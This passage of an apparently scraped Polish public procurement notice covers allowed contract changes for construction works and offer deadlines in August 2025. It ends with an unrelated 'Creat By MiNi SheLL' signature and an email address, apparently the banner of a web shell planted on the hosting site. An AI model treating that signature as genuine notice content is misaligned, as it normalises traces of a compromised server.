uniemożliwiają<br/>wykonanie przedmiotu umowy w należyty sposób,<br/>c) wystąpienie wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonawcy wykonanie robót,<br/>m.in:<br/>– gwałtowne bądź długotrwałe opady deszczu,<br/>– długo utrzymujący się podwyższony stan wód powierzchniowych i gruntowych,<br/>d) wystąpienie warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i<br/>sprawdzeń zgodnie z technologią przewidzianą w projekcie, normami lub innymi przepisami,<br/>e) opóźnienie w przekazaniu terenu robót,<br/>f) w przypadku wystąpienia obiektów archeologicznych, geologicznych lub przyrodniczych podlegających obowiązkowi<br/>badania i ochrony na podstawie właściwych przepisów,<br/>g) w przypadku wystąpienia niewypałów i niewybuchów oraz substancji niebezpiecznych dla zdrowia i życia osób<br/>wykonujących budowę,<br/>h) konieczność wykonania robót zamiennych lub zamówień dodatkowych,<br/>i) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące brakiem możliwości prowadzenia<br/>robót lub prac lub wykonania innych czynności przewidzianych umową, które spowodowały niezawinione i niemożliwe do<br/>uniknięcia przez Wykonawcę opóźnienie.<br/>3) zmiany danych teleadresowych wykonawcy, nazwy wykonawcy, osób reprezentujących firmy – na wniosek<br/>Zamawiającego lub wykonawcy w postaci pisemnej zgody Zamawiającego,<br/>4) zmiany podwykonawcy, przy pomocy którego wykonawca realizuje przedmiot umowy – na wniosek wykonawcy w postaci<br/>pisemnej zgody Zamawiającego,<br/>5) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy – na wniosek Wykonawcy w<br/>postaci pisemnej zgody Zamawiającego,<br/>6) zmiany technologiczne spowodowane w szczególności następującymi okolicznościami:<br/>a) z uwagi na możliwość osiągnięcia wymaganego efektu, przez zastosowanie innych rozwiązań technicznych lub<br/>materiałowych, przy zachowaniu jakości i parametrów technicznych obiektów budowlanych, instalacji i urządzeń,<br/>b) z uwagi na możliwość osiągnięcia wymaganego efektu przez zastosowanie innych rozwiązań technicznych lub<br/>materiałowych zwiększających jakość, parametry techniczne lub eksploatacyjne obiektów budowlanych lub skracających<br/>termin realizacji zamówienia,<br/>Pełny zakres zawiera SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/icso</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com